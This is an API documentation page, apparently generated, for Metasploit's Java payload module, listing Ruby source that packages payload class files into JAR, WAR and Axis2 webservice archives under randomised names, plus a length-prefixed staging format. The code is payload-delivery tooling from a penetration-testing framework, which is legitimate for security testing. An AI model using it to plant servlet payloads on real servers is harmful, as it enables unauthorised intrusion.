Module: Msf::Payload::Java
- Included in:
- BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
- Defined in:
- lib/msf/core/payload/java.rb
Defined Under Namespace
Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp
Instance Method Summary collapse
-
#class_files ⇒ Object
Default to no extra class files.
-
#generate(opts = {}) ⇒ Object
Used by stagers to construct the payload jar file as a String.
-
#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar.
- #generate_default_stage(opts = {}) ⇒ Object
-
#generate_jar(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create a jar file as a Rex::Zip::Jar.
-
#generate_stage(opts = {}) ⇒ Object
Used by stages; all java stages need to define
stage_class_files
as an array of .class files located in data/java/. -
#generate_war(opts = {}) ⇒ Object
Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.
-
#stage_class_files ⇒ Object
Default to no extra stage class files.
Instance Method Details
#class_files ⇒ Object
Default to no extra class files
149 150 151 |
# File 'lib/msf/core/payload/java.rb', line 149 def class_files [] end |
#generate(opts = {}) ⇒ Object
Used by stagers to construct the payload jar file as a String
34 35 36 |
# File 'lib/msf/core/payload/java.rb', line 34 def generate(opts={}) generate_jar(opts).pack end |
#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload’s #stager_config method.
119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
# File 'lib/msf/core/payload/java.rb', line 119 def generate_axis2(opts={}) raise if not respond_to? :stager_config app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8) services_xml = %Q{<service name="#{app_name}" scope="application"> <description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description> <parameter name="ServiceClass">metasploit.PayloadServlet</parameter> <operation name="run"> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> </operation> </service> } paths = [ [ 'metasploit', 'Payload.class' ], [ 'metasploit', 'PayloadServlet.class' ] ] + class_files zip = Rex::Zip::Jar.new zip.add_file('META-INF/', '') zip.add_file('META-INF/services.xml', services_xml) zip.add_files(paths, MetasploitPayloads.path('java')) zip.add_file('metasploit.dat', stager_config(opts)) zip.build_manifest(:app_name => app_name) zip end |
#generate_default_stage(opts = {}) ⇒ Object
20 21 22 23 24 25 26 27 28 29 |
# File 'lib/msf/core/payload/java.rb', line 20 def generate_default_stage(opts={}) stage = '' stage_class_files.each do |path| data = MetasploitPayloads.read('java', path) stage << [data.length, data].pack('NA*') end stage << [0].pack('N') stage end |
#generate_jar(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload’s #stager_config method.
48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
# File 'lib/msf/core/payload/java.rb', line 48 def generate_jar(opts={}) raise if not respond_to? :stager_config # Allow changing the jar's Main Class in the manifest so wrappers # around metasploit.Payload will work. main_class = opts[:main_class] || "metasploit.Payload" paths = [ [ "metasploit", "Payload.class" ], ] + class_files jar = Rex::Zip::Jar.new jar.add_sub("metasploit") if opts[:random] jar.add_file("metasploit.dat", stager_config(opts)) jar.add_files(paths, MetasploitPayloads.path('java')) jar.build_manifest(:main_class => main_class) jar end |
#generate_stage(opts = {}) ⇒ Object
Used by stages; all java stages need to define stage_class_files
as an array of .class files located in data/java/
The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:
- 32-bit big endian length ][ first raw .class file
-
…
- 32-bit big endian length ][ Nth raw .class file
- 32-bit null
- 32-bit big endian length ][ Nth raw .class file
16 17 18 |
# File 'lib/msf/core/payload/java.rb', line 16 def generate_stage(opts={}) generate_default_stage(opts) end |
#generate_war(opts = {}) ⇒ Object
Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.
75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
# File 'lib/msf/core/payload/java.rb', line 75 def generate_war(opts={}) raise if not respond_to? :stager_config zip = Rex::Zip::Jar.new web_xml = %q{<?xml version="1.0"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd"> <web-app> <servlet> <servlet-name>NAME</servlet-name> <servlet-class>metasploit.PayloadServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>NAME</servlet-name> <url-pattern>/*</url-pattern> </servlet-mapping> </web-app> } app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8) web_xml.gsub!(/NAME/, app_name) paths = [ [ "metasploit", "Payload.class" ], [ "metasploit", "PayloadServlet.class" ], ] + class_files zip.add_file('WEB-INF/', '') zip.add_file('WEB-INF/web.xml', web_xml) zip.add_file("WEB-INF/classes/", "") zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/') zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts)) zip end |
#stage_class_files ⇒ Object
Default to no extra stage class files
154 155 156 |
# File 'lib/msf/core/payload/java.rb', line 154 def stage_class_files [] end |